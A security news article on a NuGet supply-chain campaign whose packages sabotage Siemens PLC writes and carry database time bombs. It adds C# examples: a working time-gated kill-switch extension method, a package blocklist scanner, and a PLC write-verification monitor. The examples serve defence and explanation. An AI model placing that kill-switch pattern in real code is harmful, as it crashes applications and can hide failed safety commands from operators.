NuGet Packages: Database Attack Time Bombs Found

by Priyanka Patel

Time Bombs Hidden in NuGet Packages Target Industrial Systems and Databases

A sophisticated campaign has placed nine malicious packages on the NuGet repository, some of them designed to stay dormant until 2027 or 2028, posing a critical threat to both database systems and, alarmingly, industrial control systems (ICS). The attack, discovered by Socket, highlights a growing trend of supply chain attacks that reach operational technology (OT) through ordinary IT dependencies.

The malicious packages, which have amassed nearly 9,500 downloads, employ a variety of techniques to evade detection and build trust with developers. According to the researchers, the threat actor, identified as ‘shanhai666,’ has demonstrated a high level of sophistication in crafting these attacks.

ICS Targeted by Sharp7Extend Typosquat

The most concerning package identified is Sharp7Extend, a “typosquat” designed to mimic the legitimate Sharp7 library. Sharp7 is a widely used library for communicating with Siemens S7 programmable logic controllers (PLCs), the components in manufacturing, energy and logistics that directly manage physical processes.

Sharp7Extend initially appears harmless: it bundles the unmodified, functional Sharp7 library so that it behaves correctly during evaluation and testing. However, it contains two distinct sabotage mechanisms. The first causes random crashes in communication with PLCs, occurring 20 percent of the time. More insidiously, after a 30 to 90-minute “grace period,” the package silently causes 80 percent of PLC write operations to fail while still reporting success to the caller.

“This means an application believes it has successfully sent a command – like ‘engage safety system’ or ‘update setpoint’ – but the command is never executed,” researchers explained. This can lead to data corruption and, critically, potential physical safety risks.

Database Packages with delayed Activation

While Sharp7Extend poses an immediate threat to industrial operations, several other malicious packages target databases. These packages contain dormant code set to activate in 2027 and 2028, at which point each database query carries a 20 percent chance of terminating the entire application.

The malware leverages C# extension methods, which let the malicious code run transparently as part of every database query or PLC operation: the calling code invokes what looks like an ordinary helper on the connection, repository or client object, and the payload executes inside that helper before the real work is done. Because nothing at the call site looks unusual, and the trigger is both time-gated and probabilistic, detection is considerably more challenging.
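To make the pattern concrete for reviewers, here is an added, illustrative sketch of how an extension method can carry a time-gated, probabilistic kill switch. This is not shanhai666’s code and not code from the article: the repository interface, the method names, the exact trigger date and the in-memory sample rows are all assumptions made for this example. The Clock and Terminate seams exist only so the example can run today without ending the process; a real payload would read DateTime.UtcNow and call Environment.Exit directly.

```csharp
using System;
using System.Collections.Generic;

// Added illustrative sketch of the extension-method time-bomb pattern the
// article describes. NOT shanhai666's code: interface, method names and the
// trigger date are assumptions for this example.

public interface IRepository
{
    IReadOnlyList<string> Query(string sql);
}

// Benign in-memory repository standing in for the "99 percent functional"
// data layer the packages ship. Constructed sample rows, not real data.
public sealed class InMemoryRepository : IRepository
{
    private readonly List<string> _rows = new() { "alice", "bob", "carol" };
    public IReadOnlyList<string> Query(string sql) => _rows;
}

public static class RepositoryExtensions
{
    // Assumed date; the article says only that activation is in 2027/2028.
    private static readonly DateTime TriggerDate =
        new(2027, 1, 1, 0, 0, 0, DateTimeKind.Utc);
    private const double KillProbability = 0.20;   // "20 percent chance on each query"
    private static readonly Random Rng = new();

    // Seams so the example runs today without ending the process. A real
    // payload would read DateTime.UtcNow and call Environment.Exit directly.
    public static Func<DateTime> Clock { get; set; } = () => DateTime.UtcNow;
    public static Action<int> Terminate { get; set; } = Environment.Exit;

    // Reads as an innocent convenience wrapper. Every call site that writes
    // repo.QueryTracked(sql) passes through the check below without seeing it.
    public static IReadOnlyList<string> QueryTracked(this IRepository repo, string sql)
    {
        if (Clock() >= TriggerDate && Rng.NextDouble() < KillProbability)
        {
            Terminate(1);   // whole-process crash that looks like an intermittent bug
        }
        return repo.Query(sql);
    }
}

public static class Demo
{
    // Runs `queries` calls under a fixed clock and returns how many of them
    // would have terminated the process.
    public static int CountKills(DateTime now, int queries)
    {
        int kills = 0;
        RepositoryExtensions.Clock = () => now;
        RepositoryExtensions.Terminate = _ => kills++;
        IRepository repo = new InMemoryRepository();
        for (int i = 0; i < queries; i++)
        {
            repo.QueryTracked("SELECT name FROM users");
        }
        return kills;
    }

    public static void Main()
    {
        var during2025 = new DateTime(2025, 6, 1, 0, 0, 0, DateTimeKind.Utc);
        var during2028 = new DateTime(2028, 6, 1, 0, 0, 0, DateTimeKind.Utc);
        // Before the trigger date the wrapper is indistinguishable from a clean
        // helper; afterwards roughly one query in five kills the process.
        Console.WriteLine($"2025 clock: {CountKills(during2025, 1000)} kills in 1000 queries");
        Console.WriteLine($"2028 clock: {CountKills(during2028, 1000)} kills in 1000 queries");
    }
}
```

The point for a code reviewer is the combination to hunt for inside third-party extension methods on data-access or PLC client types: a comparison against a hard-coded future date, a random draw, and a process-ending call (Environment.Exit, Environment.FailFast, Process.Kill) on a path that the rest of the library calls on every operation. Under a normal test run before the trigger date the method behaves perfectly, which is exactly why vetting by functional testing alone misses it.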

A Trojan Horse Approach to Building Trust

The threat actor has employed a clever strategy to increase the likelihood of successful deployment. The packages are reported to be 99 percent functional, offering working implementations of advertised features like database repository patterns and transaction management. To further establish credibility, ‘shanhai666’ also published three wholly legitimate packages.

This tactic transforms the malicious code into a “Trojan horse,” concealing the harmful payload within thousands of lines of legitimate implementation.

Attribution Challenges and the Need for Proactive Security

Due to the probabilistic and time-delayed nature of these attacks, attribution is proving exceptionally difficult. The researchers observed that an application crashing in 2027 is unlikely to be linked to a dependency installed years earlier by a developer who may no longer be with the organization. The random crashes effectively mimic intermittent bugs, hindering forensic investigations.

Traditional security vetting processes are no longer sufficient to detect these sophisticated threats. The immediate priority is a comprehensive audit of all .NET applications, including their transitive dependencies, to identify and remove the nine malicious NuGet packages. Any system running Sharp7Extend should be considered compromised and thoroughly investigated for data integrity issues.
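One way to carry out that audit across a source tree, as an added example that is not code from the article or from Socket: walk every .csproj (direct PackageReference entries) and every packages.lock.json (which also lists transitive packages that a csproj scan would miss) and flag blocklisted names. Only Sharp7Extend is named on this page, so the blocklist below contains that one entry and the other eight names must be added from Socket’s report; the file paths and package versions in the sample inputs are constructed.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text.Json;
using System.Xml.Linq;

// Added example (not from the article): flag blocklisted NuGet packages in
// .csproj files (direct references) and packages.lock.json files (direct and
// transitive). Sample inputs below are constructed.
public static class NuGetAudit
{
    // Only Sharp7Extend is named on this page; add the remaining eight
    // package names from Socket's report.
    public static readonly HashSet<string> Blocklist =
        new(StringComparer.OrdinalIgnoreCase) { "Sharp7Extend" };

    public record Hit(string File, string Package, string Version);

    // Match PackageReference regardless of MSBuild namespace (SDK-style
    // projects have none; legacy projects declare the msbuild xmlns).
    public static IEnumerable<Hit> ScanProject(string path, string xml)
    {
        var doc = XDocument.Parse(xml);
        foreach (var el in doc.Descendants().Where(e => e.Name.LocalName == "PackageReference"))
        {
            string? name = (string?)el.Attribute("Include") ?? (string?)el.Attribute("Update");
            if (name != null && Blocklist.Contains(name))
                yield return new Hit(path, name, (string?)el.Attribute("Version") ?? "?");
        }
    }

    // packages.lock.json: { "dependencies": { "<tfm>": { "<pkg>": { "resolved": "x.y.z" } } } }
    public static IEnumerable<Hit> ScanLockFile(string path, string json)
    {
        using var doc = JsonDocument.Parse(json);
        if (!doc.RootElement.TryGetProperty("dependencies", out var frameworks)) yield break;
        foreach (var tfm in frameworks.EnumerateObject())
            foreach (var dep in tfm.Value.EnumerateObject())
                if (Blocklist.Contains(dep.Name))
                    yield return new Hit(path, dep.Name,
                        dep.Value.TryGetProperty("resolved", out var v) ? v.GetString() ?? "?" : "?");
    }

    public static IEnumerable<Hit> ScanTree(string root)
    {
        foreach (var f in Directory.EnumerateFiles(root, "*.csproj", SearchOption.AllDirectories))
            foreach (var h in ScanProject(f, File.ReadAllText(f))) yield return h;
        foreach (var f in Directory.EnumerateFiles(root, "packages.lock.json", SearchOption.AllDirectories))
            foreach (var h in ScanLockFile(f, File.ReadAllText(f))) yield return h;
    }

    public static void Main(string[] args)
    {
        // Constructed sample inputs so the example runs without a real tree;
        // pass a directory as the first argument to scan a real one as well.
        const string csproj = @"<Project Sdk=""Microsoft.NET.Sdk"">
  <ItemGroup>
    <PackageReference Include=""Sharp7"" Version=""1.0.0"" />
    <PackageReference Include=""Sharp7Extend"" Version=""1.0.0"" />
  </ItemGroup>
</Project>";
        const string lockJson = @"{ ""version"": 1, ""dependencies"": { ""net8.0"": {
  ""Sharp7Extend"": { ""type"": ""Transitive"", ""resolved"": ""1.0.0"" } } } }";

        var hits = ScanProject("Plc.csproj", csproj)
            .Concat(ScanLockFile("packages.lock.json", lockJson))
            .Concat(args.Length > 0 ? ScanTree(args[0]) : Enumerable.Empty<Hit>());
        foreach (var h in hits)
            Console.WriteLine($"BLOCKLISTED {h.Package} {h.Version} in {h.File}");
    }
}
```

Projects that do not commit packages.lock.json have no record of transitive packages in the tree; for those, `dotnet list package --include-transitive` run against each project gives the same information and should be checked the same way. A hit is a reason to treat the host as compromised, not merely to bump the version.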

This latest campaign underscores the increasing targeting of operational technology via IT supply chains. New security controls are essential, such as write verification for PLC communications (reading back every write and comparing it with what was sent, rather than trusting the library’s success code) and baseline monitoring to detect anomalous failure rates. Security teams must move beyond checking for known vulnerabilities and actively hunt for malicious intent through behavioral analysis of all third-party code.
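The following is an added example of both controls together; it is not code from the article or from the Sharp7 project. The IS7Client interface mirrors the shape of Sharp7’s S7Client.DBWrite/DBRead as I understand them (integer result, 0 meaning success); treat that as an assumption and adapt it to the real client. The fake PLC is constructed to mimic the Sharp7Extend behaviour described above, honest for a grace period and then silently dropping 80 percent of writes while still returning success, with the grace period expressed as a write count rather than 30 to 90 minutes so the example runs instantly.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;

// Added example, not from the article or the Sharp7 project. IS7Client
// mirrors the assumed shape of Sharp7's S7Client.DBWrite/DBRead (int result,
// 0 = success). The fake PLC is constructed to mimic Sharp7Extend's sabotage.

public interface IS7Client
{
    int DBWrite(int dbNumber, int start, int size, byte[] buffer);
    int DBRead(int dbNumber, int start, int size, byte[] buffer);
}

public sealed class SabotagedFakePlc : IS7Client
{
    private readonly Dictionary<int, byte[]> _blocks = new();
    private readonly Random _rng;
    private readonly double _dropRate;
    private readonly int _graceWrites;
    private int _writes;

    public SabotagedFakePlc(double dropRate, int graceWrites, int seed)
    {
        _dropRate = dropRate;
        _graceWrites = graceWrites;
        _rng = new Random(seed);
    }

    private byte[] Block(int db) =>
        _blocks.TryGetValue(db, out var b) ? b : (_blocks[db] = new byte[256]);

    public int DBWrite(int dbNumber, int start, int size, byte[] buffer)
    {
        _writes++;
        // After the grace period, drop the write but still report success (0).
        if (_writes > _graceWrites && _rng.NextDouble() < _dropRate) return 0;
        Array.Copy(buffer, 0, Block(dbNumber), start, size);
        return 0;
    }

    public int DBRead(int dbNumber, int start, int size, byte[] buffer)
    {
        Array.Copy(Block(dbNumber), start, buffer, 0, size);
        return 0;
    }
}

// Writes, reads the same bytes back, and keeps a sliding window of verified
// vs. unverified writes so the failure rate can be compared with a baseline.
public sealed class VerifiedWriter
{
    private readonly IS7Client _plc;
    private readonly Queue<bool> _window = new();
    private readonly int _windowSize;
    private readonly double _alarmRate;
    private int _failures;

    public VerifiedWriter(IS7Client plc, int windowSize, double alarmRate)
    {
        _plc = plc;
        _windowSize = windowSize;
        _alarmRate = alarmRate;
    }

    public double FailureRate => _window.Count == 0 ? 0.0 : (double)_failures / _window.Count;
    public bool Alarm => _window.Count >= _windowSize && FailureRate > _alarmRate;

    // True only when the read-back equals what was sent. A false result on a
    // safety-relevant write is an incident on its own, not just a statistic.
    public bool WriteVerified(int db, int start, byte[] data)
    {
        bool failed = _plc.DBWrite(db, start, data.Length, data) != 0;
        if (!failed)
        {
            var echo = new byte[data.Length];
            failed = _plc.DBRead(db, start, data.Length, echo) != 0 || !echo.SequenceEqual(data);
        }
        _window.Enqueue(failed);
        if (failed) _failures++;
        if (_window.Count > _windowSize && _window.Dequeue()) _failures--;
        return !failed;
    }
}

public static class Program
{
    public static void Main()
    {
        var plc = new SabotagedFakePlc(dropRate: 0.80, graceWrites: 200, seed: 7);
        var writer = new VerifiedWriter(plc, windowSize: 50, alarmRate: 0.05);

        for (int i = 1; i <= 400; i++)
        {
            // Changing setpoint (constructed ramp) so a dropped write is visible.
            byte[] setpoint = BitConverter.GetBytes((ushort)(1000 + i));
            bool ok = writer.WriteVerified(db: 10, start: 0, data: setpoint);
            if (!ok)
                Console.WriteLine($"write #{i}: read-back mismatch, setpoint NOT applied");
            if (writer.Alarm)
            {
                Console.WriteLine($"write #{i}: failure rate {writer.FailureRate:P0} exceeds baseline, stopping");
                break;
            }
        }
    }
}
```

Two caveats a practitioner should keep in mind. Read-back cannot detect a dropped write when the target already holds the value being written, so pair it with a field that changes on every write (a sequence number or heartbeat word) or a PLC-side acknowledgement. And the baseline must be learned on a known-good deployment; here the window fills with verified writes during the grace period, so the first few silent drops after it push the rate past the threshold within a handful of writes, which is the behaviour a failure-rate monitor needs in order to catch a 30 to 90-minute delayed trigger.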

Did you know? The malicious packages have been downloaded nearly 9,500 times, potentially affecting numerous systems.
Pro tip: Immediately audit all .NET applications, including transitive dependencies, and remove the nine identified malicious NuGet packages.
Reader question: What is a typosquat? A malicious package whose name closely resembles that of a legitimate one, designed to trick developers into installing it by mistake.